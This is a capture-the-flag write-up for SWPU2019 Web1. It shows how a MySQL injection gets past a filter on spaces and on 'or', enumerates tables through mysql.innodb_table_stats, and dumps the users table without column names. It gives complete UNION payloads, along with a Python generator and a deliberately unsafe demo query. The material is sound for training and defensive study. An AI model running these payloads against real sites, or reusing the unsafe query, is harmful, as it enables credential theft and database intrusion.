
[SWPU2019]Web1 WriteUp

Knowledge points

Know which system tables can be queried to enumerate table names.

Besides the commonly used TABLES, COLUMNS and SCHEMATA in information_schema:

sys.schema_auto_increment_columns (sys schema, MySQL 5.7 and later) lists every table that has an AUTO_INCREMENT column, one row per such column.


Column name: meaning

table_schema: database the table belongs to
table_name: table name
column_name: name of the AUTO_INCREMENT column

The mysql schema also has innodb_index_stats and innodb_table_stats, which list every InnoDB table (including all user-defined tables). Reading them needs SELECT on the mysql schema, which the over-privileged application accounts common in CTF targets usually have.


Column name: meaning

database_name: database name
table_name: table name

Injection without column names

Template: select * from ads where name='-1' union select 1,(select group_concat(a,0x7e,b) from (select 1,2 as a,3 as b union select * from user) XXX),3,4,5,6

The inner derived table starts with a row of constants aliased a and b; the rows appended by union select * from user take those aliases by position, so the outer group_concat reads the second and third columns of user without ever naming them. The constant row itself appears in the output as 2~3 and is simply ignored. The derived table must have exactly as many columns as user, so the column count still has to be known or guessed.

Solution

To get started I scanned the site first and found nothing. I tried the usual guesses based on experience, but did not know the admin password. So just register, log in and post an ad. That turned up SQL injection. Challenges like this are usually about session hijacking: log in as admin and the flag appears. This one, however, is about the SQL injection.

A quick test shows the input lands inside single quotes, and that or, and, spaces and comment markers are filtered. So order and information_schema cannot be used (both contain "or").

Use /**/ in place of spaces and try column counts one at a time; the count is 22.


Columns 2 and 3 are displayed. Checking the version and the current database shows the database is named web1.

123'/**/uNIon/**/select/**/1,2,concat(version(),0x7e,schema()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22


Next, the table names. sys.schema_auto_increment_columns cannot be used here, but mysql.innodb_table_stats works; the tables are ads and users.

123'/**/uNIon/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=schema()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22


From experience, ads stores the advertisements and users stores the registered accounts and passwords, so the flag may be there. Column names are only available from information_schema.COLUMNS, so this has to be injected without column names. Again from experience, the users table has only three columns, guessed to be id, username and password.

Query the contents of the users table:

123'/**/uNIon/**/select/**/1,2,(select/**/group_concat(a,0x7e,b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/uNIon/**/select/**/*/**/from/**/users)XXX),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22


As you can see, the two accounts I registered, admin and admin123, show up in users. The passwords should be MD5 hashes.
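The following is an added example, not code from the writeup or the challenge, that reproduces the two techniques above end to end: the space-to-/**/ bypass for the blacklist, and the column-name-free dump through an aliased derived table. It models the target with an in-memory SQLite database (assumptions: ads has 4 columns instead of 22, users has the guessed id/username/password columns, the blacklist is exactly the tokens the writeup reports, and the two seed rows with their MD5 hashes are constructed). build_payload also emits the MySQL form of the payload, which matches the one used against the real challenge; the SQLite form only swaps group_concat(a,0x7e,b) for a||char(126)||b because SQLite's group_concat takes a separator, not extra columns.

```python
import sqlite3

# Constructed stand-in for the challenge database (assumption: ads has 4
# columns here instead of the real 22; users keeps the guessed 3 columns).
SEED_USERS = [
    (1, "admin", "21232f297a57a5a743894a0e4a801fc3"),     # md5("admin"), constructed
    (2, "admin123", "0192023a7bbd73250516f069df18b500"),  # md5("admin123"), constructed
]

def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (id INTEGER, name TEXT, content TEXT, owner TEXT)")
    conn.execute("INSERT INTO ads VALUES (1, 'sale', 'cheap stuff', 'admin')")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_USERS)
    return conn

# Assumed model of the challenge's blacklist: the writeup says or, and,
# spaces and comment markers are filtered, so these substrings are rejected.
BLACKLIST = (" ", "or", "and", "#", "--")

def is_blocked(user_input):
    low = user_input.lower()
    return any(tok in low for tok in BLACKLIST)

def vulnerable_search(conn, name):
    """The injectable query from the writeup, behind the assumed filter."""
    if is_blocked(name):
        raise ValueError("rejected by filter")
    sql = "select * from ads where name='" + name + "'"  # deliberately unsafe
    return conn.execute(sql).fetchall()

def spaceless(sql):
    """Inline comments are whitespace to the parser but not to the filter."""
    return sql.replace(" ", "/**/")

def build_payload(total_cols, show_col, table, table_cols, dialect="mysql", prefix="123"):
    """Column-name-free dump of `table` through column `show_col` of a
    `total_cols`-wide UNION. The derived table's first row is constants
    aliased a, b, ...; the UNIONed rows of `table` take those names by
    position, so no real column name ever appears in the query."""
    aliases = [chr(ord("a") + i) for i in range(table_cols - 1)]
    header = "1," + ",".join(f"{i + 2} as {aliases[i]}" for i in range(table_cols - 1))
    if dialect == "mysql":
        glue = "group_concat(" + ",0x7e,".join(aliases) + ")"          # 0x7e is '~'
    else:  # SQLite: group_concat's 2nd arg is a separator, so concatenate with ||
        glue = "group_concat(" + "||char(126)||".join(aliases) + ")"
    inner = f"(select {glue} from (select {header} uNIon select * from {table})XXX)"
    cols = [str(i) for i in range(1, total_cols + 1)]
    cols[show_col - 1] = inner
    # The last column is opened as a string so the app's trailing quote closes it.
    return spaceless(f"{prefix}' uNIon select " + ",".join(cols[:-1]) + ",'" + cols[-1])

def parse_dump(blob, table_cols):
    """Turn 'a~b,a~b,...' back into rows, dropping the constant header row (2~3)."""
    header = tuple(str(i + 2) for i in range(table_cols - 1))
    rows = [tuple(r.split("~")) for r in blob.split(",")]
    return [r for r in rows if r != header]

def dump_users(conn):
    """Run the whole chain against the demo database; returns (username, hash) rows."""
    payload = build_payload(4, 3, "users", 3, dialect="sqlite", prefix="-1")
    result = vulnerable_search(conn, payload)
    return parse_dump(result[0][2], 3)  # column 3 is one of the displayed columns

if __name__ == "__main__":
    print(build_payload(22, 3, "users", 3))  # the MySQL payload used in the writeup
    for user, pw_hash in dump_users(build_db()):
        print(user, pw_hash)
```

Because the derived table is a plain UNION, the constant header row is deduplicated against real rows and the row order is not guaranteed; parse_dump therefore matches the header by value rather than by position, and consumers should treat the result as a set.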
